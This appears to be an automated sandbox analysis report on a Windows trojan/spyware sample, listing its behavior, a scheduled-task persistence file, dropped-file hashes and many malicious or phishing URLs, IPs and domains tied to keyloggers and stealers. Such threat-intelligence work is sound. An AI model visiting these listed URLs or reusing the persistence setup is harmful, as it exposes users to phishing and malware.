                                                          Classification:mal100.troj.spyw.evad.winEXE@20/11@5/4
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 173
                                                          • Number of non-executed functions: 33
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target lyNyKapwZJLKnn.exe, PID 7540 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          02:51:15API Interceptor8969270x Sleep call for process: 2i3Lj7a8Gk.exe modified
                                                          02:51:17API Interceptor17x Sleep call for process: powershell.exe modified
                                                          02:51:19API Interceptor6672366x Sleep call for process: lyNyKapwZJLKnn.exe modified
                                                          07:51:17Task SchedulerRun new task: lyNyKapwZJLKnn path: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.220e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                            YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                              qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                        Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                            SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                              188.114.96.3http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                              • revexhibition.pages.dev/favicon.ico
                                                                              http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                                              • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                              http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                                              • www.tkmall-wholesale.com/
                                                                              c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                                              • winfileshare.com/ticket_line/llb.php
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/eZFzMENr/download
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/eZFzMENr/download
                                                                              1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                                              http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                              • asm.alcateia.org/
                                                                              hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                              • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.bayarcepat19.click/g48c/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              reallyfreegeoip.orgVX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 172.67.177.134
                                                                              checkip.dyndns.comVX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              api.telegram.orge4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                              • 149.154.167.220
                                                                              Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                              • 149.154.167.220
                                                                              SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                              • 149.154.167.220

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              TELEGRAMRUzncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                              • 149.154.167.99
                                                                              e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                              • 149.154.167.220
                                                                              https://floral-heart-eeff.3p3ka4x.workers.dev/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.99
                                                                              https://sexyboobsme.pages.dev/Get hashmaliciousPorn ScamBrowse
                                                                              • 149.154.167.99
                                                                              https://telegrambotfix.pages.dev/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.99
                                                                              https://minthunts4.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.99
                                                                              http://neww.web-r33s.live/lucah-1/Get hashmaliciousTelegram PhisherBrowse
                                                                              • 149.154.167.99
                                                                              https://huntnfts3.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.99
                                                                              A2HOSTINGUShttp://allstatelock.comGet hashmaliciousUnknownBrowse
                                                                              • 68.66.216.31
                                                                              https://mairenaflores.com/office.htmlGet hashmaliciousUnknownBrowse
                                                                              • 68.66.200.212
                                                                              https://upsprioritymails.com/Get hashmaliciousUnknownBrowse
                                                                              • 66.198.240.25
                                                                              are_steering_wheel_knobs_legal_on_commercial_vehicles(70726).jsGet hashmaliciousGookitLoaderBrowse
                                                                              • 68.66.224.8
                                                                              https://lumieregroup.ae/gjf/index.php?mail=bk.kim@hdel.co.krGet hashmaliciousUnknownBrowse
                                                                              • 68.66.226.99
                                                                              https://www.tiktok.com/////link/v2?aid=1988&lang=enpccf5n&scene=bio_url&target=google.com.tw.////amp/s/%E2%80%8BLearfield%E2%80%8B.%E2%80%8Ba%C2%ADte%C2%ADd%C2%ADs%C2%ADe%C2%ADn%C2%ADat%C2%ADe%E2%80%8B.o%C2%ADn%C2%ADe%E2%80%8B/3CbNpTGet hashmaliciousPhisherBrowse
                                                                              • 103.227.176.4
                                                                              https://bahamastourdeals.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVZXWjRia289JnVpZD1VU0VSMTUwODIwMjRVMjMwODE1MTE=N0123NGet hashmaliciousUnknownBrowse
                                                                              • 68.66.229.177
                                                                              SecureMessageATT.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 68.66.229.177
                                                                              https://www.carsoup.com/api/v1/connections/store?type=web_referrals&dealer_id=18689&redirect=https%3A%2F%2Flyn.bz/bbbGet hashmaliciousHTMLPhisherBrowse
                                                                              • 185.146.22.239
                                                                              firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                              • 75.98.175.92
                                                                              CLOUDFLARENETUShttps://vvtx.org/q76938a7ap0b7d49301b74285fc262c0b4e8.html&data=05/Get hashmaliciousUnknownBrowse
                                                                              • 104.26.9.233
                                                                              https://pub-3b380a6d506e4fdbb1786f239cfe3be3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://pub-798464f3fd9d44d0b3d15c59379a2110.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://pub-ed4436928a0f4db6a9860bf39f13ccf7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://pub-f3fd7582ff8a4d27a648a25dda05fecf.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://pub-b60bbcf7edd9477a8f686caa270d9f9c.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://pub-d55459157ebb42a9815eb5a80662b7e8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://sneamcomnnumnlty.com/hfjf748934924/geting/putGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              https://attachmentattt.netlify.app/Get hashmaliciousUnknownBrowse
                                                                              • 104.17.24.14
                                                                              https://meta.case-page-appeal.eu/community-standard/472356516148192Get hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              UTMEMUSVX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              Urgent inquiry for quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              Ziraat Bankasi Swift Mesaji_20241003_3999382.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9adVX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                              • 188.114.96.3
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Winscreen.exeGet hashmaliciousXmrigBrowse
                                                                              • 188.114.96.3
                                                                              Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://ipfs.io/ipfs/bafkreibgdbnu3tuzgf67i4df7bjrmnd32cxot5fwvnixsiomyn2sw6sfruGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              https://sneamcomnnumnlty.com/hfjf748934924/geting/putGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              https://attachmentattt.netlify.app/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              http://www.mallpurchase.com/Get hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                              • 149.154.167.220
                                                                              Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                                                              • 149.154.167.220

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2i3Lj7a8Gk.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lyNyKapwZJLKnn.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2232
                                                                              Entropy (8bit):5.380805901110357
                                                                              Encrypted:false
                                                                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZLiUyus:lGLHyIFKL3IZ2KRH9Oug4Xs
                                                                              MD5:52F0904A64FC9155F29D06C831D2B472
                                                                              SHA1:4BCDB36C8C3D9DA459100EFC71147A2C9B8300CA
                                                                              SHA-256:35993186A4051DEFC81F2198AAEA784327C4E674279A2903FBBEBB25334BD79D
                                                                              SHA-512:7C6FC75ED4D3D84D4C83557EB99720BF1597A7092343C6B1506A518C8D12056D0566B94095559B4E2E689F171BD8043B4ACC38AABC097759F0ADFB63C1127585
                                                                              Malicious:false
                                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzpb1503.zrg.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h142no2g.mzf.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx0phzgr.my4.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w00ibzth.cxi.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\tmp760C.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1580
                                                                              Entropy (8bit):5.120160303700483
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaLxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTYv
                                                                              MD5:34BA105F394EA821C093241573B42FB4
                                                                              SHA1:B09D73825BF6F9049A8F2A9D01A0532C7D548F75
                                                                              SHA-256:CEAFC8D99EB61AE6D2575568021B7CFAAECC7E661D5F1F23CB40E11D1890AF5E
                                                                              SHA-512:3BAD0893D3EDB4E6C42B7EA271652E6835291202FF036992463DC23C3E44A1A2B3ACA34F3F025A639D588B097F66A8B36169B84F7A83905759536CC97D48F11F
                                                                              Malicious:true
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                              C:\Users\user\AppData\Local\Temp\tmp8686.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1580
                                                                              Entropy (8bit):5.120160303700483
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaLxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTYv
                                                                              MD5:34BA105F394EA821C093241573B42FB4
                                                                              SHA1:B09D73825BF6F9049A8F2A9D01A0532C7D548F75
                                                                              SHA-256:CEAFC8D99EB61AE6D2575568021B7CFAAECC7E661D5F1F23CB40E11D1890AF5E
                                                                              SHA-512:3BAD0893D3EDB4E6C42B7EA271652E6835291202FF036992463DC23C3E44A1A2B3ACA34F3F025A639D588B097F66A8B36169B84F7A83905759536CC97D48F11F
                                                                              Malicious:false
